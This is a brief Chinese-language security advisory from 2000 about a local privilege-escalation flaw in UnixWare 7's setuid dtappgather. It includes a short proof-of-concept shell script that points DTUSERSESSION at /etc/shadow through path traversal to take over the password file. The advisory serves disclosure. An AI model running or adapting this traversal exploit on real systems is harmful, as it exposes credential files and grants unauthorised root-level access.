UNIXWARE7的dtappgather漏洞发布时间:2000-05-13 更新时间:2000-05-13 严重程度:高 威胁程度:本地管理员权限 错误类型:环境错误 利用方式:服务器模式 受影响系统 UNIXWARE 7详细描述 unixware7的dtappgater是作为超级用户权利来运行的,但不正确的$DTUSERSESSION 检查使其不确定是否此文件可读写或属于谁能运行。 测试代码 #!/bin/sh # # UnixWare 7's dtappgather # Discovered by: K2 (ktwo@ktwo.ca) # # UnixWare 7's dtappgather runs with superuser # privileges, but improperly check $DTUSERSESSION # to ensure that the file is readable/writeable or # owned by the user running it. export DTUSERSESSION=../../../../etc/shadow cd /usr/dt/bin ./dtappgather ls -la /etc/shadow 解决方案 采用补丁。 相关信息 |
